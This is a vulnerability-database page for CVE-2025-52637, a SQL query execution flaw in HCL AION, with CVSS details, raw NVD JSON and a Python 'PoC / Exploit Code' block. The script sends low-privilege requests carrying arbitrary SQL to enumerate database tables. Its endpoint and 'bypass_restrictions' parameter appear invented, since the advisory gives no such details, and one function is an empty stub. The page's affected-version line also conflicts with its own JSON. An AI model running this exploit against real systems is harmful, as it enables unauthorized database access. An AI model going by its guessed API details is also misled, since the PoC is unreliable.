Security Vulnerability Report
中文
CVE-2025-52637 CVSS 4.5 MEDIUM

CVE-2025-52637

Published: 2026-03-16 14:17:59
Last Modified: 2026-03-27 17:31:23
Source: [email protected]

Description

HCL AION is affected by a vulnerability where certain offering configurations may permit execution of potentially harmful SQL queries. Improper validation or restrictions on query execution could expose the system to unintended database interactions or limited information exposure under specific conditions.

CVSS Details

CVSS Score
4.5
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:hcl:aion:*:*:*:*:*:*:*:* - VULNERABLE
HCL AION 所有启用特定配置选项的版本

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2025-52637 PoC - HCL AION SQL Query Execution # This PoC demonstrates the improper SQL query execution vulnerability import requests import json # Configuration TARGET_HOST = "https://vulnerable-hcl-aion-server.com" API_ENDPOINT = "/api/v1/query/execute" AUTH_TOKEN = "Bearer <low_privilege_token>" def exploit_sql_injection(): """ Exploit for CVE-2025-52637 HCL AION improper SQL query execution via specific configurations """ headers = { "Authorization": AUTH_TOKEN, "Content-Type": "application/json" } # Malicious SQL payload exploiting improper validation payload = { "config_id": "special_offering_config_001", "query": "SELECT * FROM information_schema.tables", "execute_mode": "bypass_restrictions" } try: response = requests.post( f"{TARGET_HOST}{API_ENDPOINT}", headers=headers, json=payload, verify=False, timeout=30 ) if response.status_code == 200: result = response.json() print("[+] Successfully executed SQL query") print(f"[+] Response: {json.dumps(result, indent=2)}") return result else: print(f"[-] Request failed with status: {response.status_code}") return None except requests.exceptions.RequestException as e: print(f"[-] Error: {str(e)}") return None def enumerate_database_structure(): """ Enumerate database structure using the vulnerability """ queries = [ "SELECT table_name FROM information_schema.tables", "SELECT column_name, data_type FROM information_schema.columns", "SELECT schemaname, tablename FROM pg_catalog.pg_tables" ] for query in queries: payload = { "config_id": "special_offering_config_001", "query": query, "execute_mode": "bypass_restrictions" } # Execute query... pass if __name__ == "__main__": print("CVE-2025-52637 - HCL AION SQL Query Execution PoC") print("=" * 50) exploit_sql_injection()

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-52637", "sourceIdentifier": "[email protected]", "published": "2026-03-16T14:17:59.457", "lastModified": "2026-03-27T17:31:23.220", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "HCL AION is affected by a vulnerability where certain offering configurations may permit execution of potentially harmful SQL queries. Improper validation or restrictions on query execution could expose the system to unintended database interactions or limited information exposure under specific conditions."}, {"lang": "es", "value": "HCL AION se ve afectado por una vulnerabilidad donde ciertas configuraciones de la oferta pueden permitir la ejecución de consultas SQL potencialmente dañinas. Una validación o restricciones inadecuadas en la ejecución de consultas podrían exponer el sistema a interacciones no deseadas con la base de datos o a una exposición limitada de información bajo condiciones específicas."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:L/I:L/A:L", "baseScore": 4.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.0, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:hcl:aion:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0", "versionEndExcluding": "2.1.2", "matchCriteriaId": "43DEFA2D-ED07-4867-BC69-DD77EABA83B0"}]}]}], "references": [{"url": "https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0129410", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.